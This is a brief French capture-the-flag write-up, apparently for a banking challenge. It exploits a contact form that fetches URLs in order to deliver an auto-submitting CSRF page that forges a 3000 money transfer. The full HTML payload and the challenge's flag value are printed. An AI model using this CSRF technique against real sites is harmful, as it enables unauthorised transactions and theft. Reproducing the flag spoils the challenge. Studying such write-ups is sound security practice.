En tentant des failles XSS sur le formulaire de contact, je me rends compte que le request-bin que j'utilise recoit des GET. 
En fait le formulaire fait un get sur l'URL qui lui est donnée (oui je sais pas pourquoi), mais du coup on peut tenter une CSRF qui ca imiter les requetes de virement

je monte un site bidon chez moi sous apache, et la page principale est constituée de ce code : 

<html>
<body>
<script> history.pushState('','',''/') </script>
<form action="http://upcredit4.chall.malicecyber.com/transfer" method="POST">
<input type="hidden"  name="account" value="votreID" />
<input type="hidden"  name="amount" value="3000" />
<input type="submit"  value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

On envoi un mail au banquier avec notre adresse et assez rapidement l'argent tombe ! 

On peut alors acheter le flag ! 
W1nG4rD1um\L3v1os444! 